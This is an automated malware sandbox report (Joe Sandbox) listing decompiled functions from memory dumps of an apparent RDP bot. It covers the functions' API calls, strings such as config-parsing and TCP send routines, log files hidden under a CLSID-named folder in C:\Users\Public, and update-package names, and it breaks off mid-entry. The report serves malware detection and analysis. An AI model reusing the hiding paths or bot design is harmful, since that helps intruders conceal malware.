C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA5574B54, 00007FFDA5574B87, 00007FFDA5574BBA
[D] (%s) -> Done(name=%s), xrefs: 00007FFDA5574C2D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 56b59aa19423780b5026dc0729af1700e2a8fe1ce78730d6a1e8012a8c69571a
Instruction ID: 022c57c307d58bd86c1269e8ff27ee602cd9482e53fe0695311b1cf5f4480b81
Opcode Fuzzy Hash: 56b59aa19423780b5026dc0729af1700e2a8fe1ce78730d6a1e8012a8c69571a
Instruction Fuzzy Hash: 87414269B0F64FE5FB228F20E8603B46250AF62B48F844476DA0D0A793DF7CE945D308

Function 00007FFDA5BA16D9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDA5BA17CD

Strings

(name != NULL), xrefs: 00007FFDA5BA174E
(sec != NULL), xrefs: 00007FFDA5BA1781
NULL, xrefs: 00007FFDA5BA1844
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA5BA1729, 00007FFDA5BA175C, 00007FFDA5BA178F
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA5BA1714, 00007FFDA5BA1747, 00007FFDA5BA177A
[D] (%s) -> Done(name=%s), xrefs: 00007FFDA5BA17ED
ini_get_sec, xrefs: 00007FFDA5BA1722, 00007FFDA5BA1755, 00007FFDA5BA1788, 00007FFDA5BA17E6, 00007FFDA5BA1824
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFDA5BA182B
(ini != NULL), xrefs: 00007FFDA5BA171B

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: f0443edcf3f04fd30a4adbc8c979c323cfb7dd93a8a0e8607432220d00bd6f0e
Instruction ID: 2329a2711bec9c84747a02f0c7e175414a4954c5dc419dcd556183878aa03a8f
Opcode Fuzzy Hash: f0443edcf3f04fd30a4adbc8c979c323cfb7dd93a8a0e8607432220d00bd6f0e
Instruction Fuzzy Hash: 864162A1F0A54F9AFE548B00E8217B52210BF12B8AF558436EB4D067A3EF7DE549C308

Function 00007FFDAC1280C9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFDAC1281BD

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC128119, 00007FFDAC12814C, 00007FFDAC12817F
ini_get_sec, xrefs: 00007FFDAC128112, 00007FFDAC128145, 00007FFDAC128178, 00007FFDAC1281D6, 00007FFDAC128214
(sec != NULL), xrefs: 00007FFDAC128171
(name != NULL), xrefs: 00007FFDAC12813E
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFDAC12821B
(ini != NULL), xrefs: 00007FFDAC12810B
NULL, xrefs: 00007FFDAC128234
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC128104, 00007FFDAC128137, 00007FFDAC12816A
[D] (%s) -> Done(name=%s), xrefs: 00007FFDAC1281DD

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 93323fb79a3863e3d9a00266f6e99e82c7afa1fbf390ff36a4282fd3e10854d5
Instruction ID: 8d27ef00ae75c3be6b6535217efcb249652612ee25b516bfa6e86bd7bbc8c783
Opcode Fuzzy Hash: 93323fb79a3863e3d9a00266f6e99e82c7afa1fbf390ff36a4282fd3e10854d5
Instruction Fuzzy Hash: B3412C67B0AA47D5FA539B40EA603B522A0FB513ECF444032DA4C06797DF3CE946D389

Function 00007FF70CAD13CD Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF70CAD13D8
strlen.MSVCRT ref: 00007FF70CAD13F4
strlen.MSVCRT ref: 00007FF70CAD1400
strlen.MSVCRT ref: 00007FF70CAD148A
strlen.MSVCRT ref: 00007FF70CAD14B7

Strings

pkg, xrefs: 00007FF70CAD1416
.applied, xrefs: 00007FF70CAD1492
update.p, xrefs: 00007FF70CAD1409
????-pat, xrefs: 00007FF70CAD144A
tch.pkg, xrefs: 00007FF70CAD1457

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: strlen
String ID: .applied$????-pat$pkg$tch.pkg$update.p
API String ID: 39653677-1686225151
Opcode ID: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
Instruction ID: 5482558e656a6049119e98a93bec276044e6508a858fdbce1b346a5726812ca6
Opcode Fuzzy Hash: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
Instruction Fuzzy Hash: 6221E5D2A0CB4341FB207A25BC04BBD96904F55BE9FC88030DA4F0B78ADF2CA8548361

Function 00007FFDA55D9DC2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFDA55D9E6E
fflush.MSVCRT ref: 00007FFDA55D9E7A
EnterCriticalSection.KERNEL32 ref: 00007FFDA55D9E93
LeaveCriticalSection.KERNEL32 ref: 00007FFDA55D9EBB
CopyFileA.KERNEL32 ref: 00007FFDA55D9F18

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFDA55D9EDB
., xrefs: 00007FFDA55D9EFD
1, xrefs: 00007FFDA55D9F02

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
API String ID: 513531256-2601447032
Opcode ID: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
Instruction ID: bbf50ed0d2a449191082bf4d100c2bc9e9a3b851f4969ecd845203d559348e87
Opcode Fuzzy Hash: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
Instruction Fuzzy Hash: E6418C6AB0A68986F322DF55E8607B92261FB8BF80F500035DE0D87797DF2DE5958708

Function 00007FFDAC0F1352 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFDAC0F13FE
fflush.MSVCRT ref: 00007FFDAC0F140A
EnterCriticalSection.KERNEL32 ref: 00007FFDAC0F1423
LeaveCriticalSection.KERNEL32 ref: 00007FFDAC0F144B
CopyFileA.KERNEL32 ref: 00007FFDAC0F14A8

Strings

1, xrefs: 00007FFDAC0F1492
., xrefs: 00007FFDAC0F148D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFDAC0F146B

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
API String ID: 513531256-2729875187
Opcode ID: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
Instruction ID: 564adb8ab9619d95538c756fa826987e55b1490873f45a780f2402da86efb840
Opcode Fuzzy Hash: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
Instruction Fuzzy Hash: 6E416B66B0E64586F322AB11E8B03AA2260BB997E4F500031DA4E5779BDF3CE585C74C

Function 00007FFDA55740D2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFDA557417E
fflush.MSVCRT ref: 00007FFDA557418A
EnterCriticalSection.KERNEL32 ref: 00007FFDA55741A3
LeaveCriticalSection.KERNEL32 ref: 00007FFDA55741CB
CopyFileA.KERNEL32 ref: 00007FFDA5574228

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFDA55741EB
1, xrefs: 00007FFDA5574212
., xrefs: 00007FFDA557420D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
API String ID: 513531256-2115573132
Opcode ID: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
Instruction ID: 62b38fb98594c3ee67b6966a7e69074a294034bc0c2473cc80875f543e162659
Opcode Fuzzy Hash: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
Instruction Fuzzy Hash: E241A429B0E64A86F322AF11E8657B967D0FB96F50FC00070E94D47797CF2CE5859B08

Function 00007FFDA5BA2072 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFDA5BA211E
fflush.MSVCRT ref: 00007FFDA5BA212A
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA2143
LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA216B
CopyFileA.KERNEL32 ref: 00007FFDA5BA21C8

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFDA5BA218B
1, xrefs: 00007FFDA5BA21B2
., xrefs: 00007FFDA5BA21AD

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
API String ID: 513531256-1680544107
Opcode ID: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
Instruction ID: 0ba6fa1ac3781818ec53cd46836195fac4f13ce86c951bf90bb079cdefcb5604
Opcode Fuzzy Hash: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
Instruction Fuzzy Hash: 38418121B0E64996F7209B10E8743AA7361BB8AF82F950431EB0D47793CF7DE5858708

Function 00007FFDAC1277A2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFDAC12784E
fflush.MSVCRT ref: 00007FFDAC12785A
EnterCriticalSection.KERNEL32 ref: 00007FFDAC127873
LeaveCriticalSection.KERNEL32 ref: 00007FFDAC12789B
CopyFileA.KERNEL32 ref: 00007FFDAC1278F8

Strings

1, xrefs: 00007FFDAC1278E2
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFDAC1278BB
., xrefs: 00007FFDAC1278DD

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
API String ID: 513531256-3034662401
Opcode ID: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
Instruction ID: 6549bf4aa308615094f03ddc1c0a841893b76dfd3a3d1551e2003938b69c3228
Opcode Fuzzy Hash: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
Instruction Fuzzy Hash: 0F417E67B1EA418AF362AB11E8703FA6290EB847E4F804031DA0D4BB97CF2CE555C749

Function 00007FFDAC128600 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFDAC12869A
_errno.MSVCRT ref: 00007FFDAC1286B8
_errno.MSVCRT ref: 00007FFDAC1286C4

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC128680
(value != NULL), xrefs: 00007FFDAC128672
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFDAC1286EB
ini_get_uint32, xrefs: 00007FFDAC128679, 00007FFDAC1286E4
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDAC12866B

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
API String ID: 2918714741-1670302297
Opcode ID: f046acac88eb62b3feff1e80da97ec2868d64679d8ce197bad3e6f2254f12524
Instruction ID: 81757724593b3b5dbe39d3ebfbeeb69a93a788785c831eecebb88ea66c7f562b
Opcode Fuzzy Hash: f046acac88eb62b3feff1e80da97ec2868d64679d8ce197bad3e6f2254f12524
Instruction Fuzzy Hash: DA21A067B09A8386F7529F15E960BAA26E0FB847E8F444032EE4C47756CF3CD846C745

Function 00007FF70CAD5B79 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32 ref: 00007FF70CAD5C17
GetLastError.KERNEL32 ref: 00007FF70CAD5C32

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

Strings

[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu), xrefs: 00007FF70CAD5C50
fs_file_copy, xrefs: 00007FF70CAD5BE6, 00007FF70CAD5C49, 00007FF70CAD5D97
NULL, xrefs: 00007FF70CAD5D75, 00007FF70CAD5D81
[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x), xrefs: 00007FF70CAD5BED
[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d), xrefs: 00007FF70CAD5D9E

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: CopyErrorFileLastfflushfwrite
String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
API String ID: 2887799713-3464183404
Opcode ID: abeee46ed548c0300b91caecac4e073b6ecdf4de12b2e01da956357d17c63fff
Instruction ID: 0f7bfe22f08e751c8bc6b1324e1a4e2bc7ddd671eb8630672f3fc6ec5c0ec98f
Opcode Fuzzy Hash: abeee46ed548c0300b91caecac4e073b6ecdf4de12b2e01da956357d17c63fff
Instruction Fuzzy Hash: 45414DD1D0C61B86FB24BA15BC04F79E6647F40B8CED40132D94F0A698FFACAA819731

Function 00007FF70CAD55AD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,?,?,00007FF70CAD6311), ref: 00007FF70CAD55C4
GetLastError.KERNEL32 ref: 00007FF70CAD561B

Strings

[I] (%s) -> Done(path=%s), xrefs: 00007FF70CAD5760
[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu), xrefs: 00007FF70CAD5630
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD5604
NULL, xrefs: 00007FF70CAD574A
fs_file_delete, xrefs: 00007FF70CAD55FD, 00007FF70CAD5629, 00007FF70CAD5759

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
API String ID: 2018770650-4119452840
Opcode ID: 3481a8a7b8046b2c6ab42afb30bdd3258bdedae9a155e12ccb222bea2978765e
Instruction ID: ff4b4facfce6b67e4ba4fe946a194c0465b346b8f2587fde588e925005f19f99
Opcode Fuzzy Hash: 3481a8a7b8046b2c6ab42afb30bdd3258bdedae9a155e12ccb222bea2978765e
Instruction Fuzzy Hash: 2E310CD2E1C20B82FA21B754BC40FBCA1525F51758FE90532D91F0A6D9EF2CAD859722

Function 00007FFDA5BA2F7D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFDA5BA2FCB
WSAGetLastError.WS2_32 ref: 00007FFDA5BA2FDA

Strings

[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA5BA2FED
[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFDA5BA301E
tcp_send, xrefs: 00007FFDA5BA2FE6, 00007FFDA5BA3017
tcp_recv, xrefs: 00007FFDA5BA3037
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDA5BA303E

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: 670191f5258ba8218d32dc0bec4fe6d6a4bc0dce6a9aabdc1e94b7983a4c5b0e
Instruction ID: 7634b41df5d8e1c663f25d1efb26dd5051ccb04401825cd136189240887d777d
Opcode Fuzzy Hash: 670191f5258ba8218d32dc0bec4fe6d6a4bc0dce6a9aabdc1e94b7983a4c5b0e
Instruction Fuzzy Hash: 46210E10B1A50A86EE304625A8B07B596106F07FF6E044730EE2D46BD3CE2EE401C308

Function 00007FFDAC121CBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFDAC121D0B
WSAGetLastError.WS2_32 ref: 00007FFDAC121D1A

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDAC121D7E
[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDAC121D2D
tcp_recv, xrefs: 00007FFDAC121D77
tcp_send, xrefs: 00007FFDAC121D26, 00007FFDAC121D57
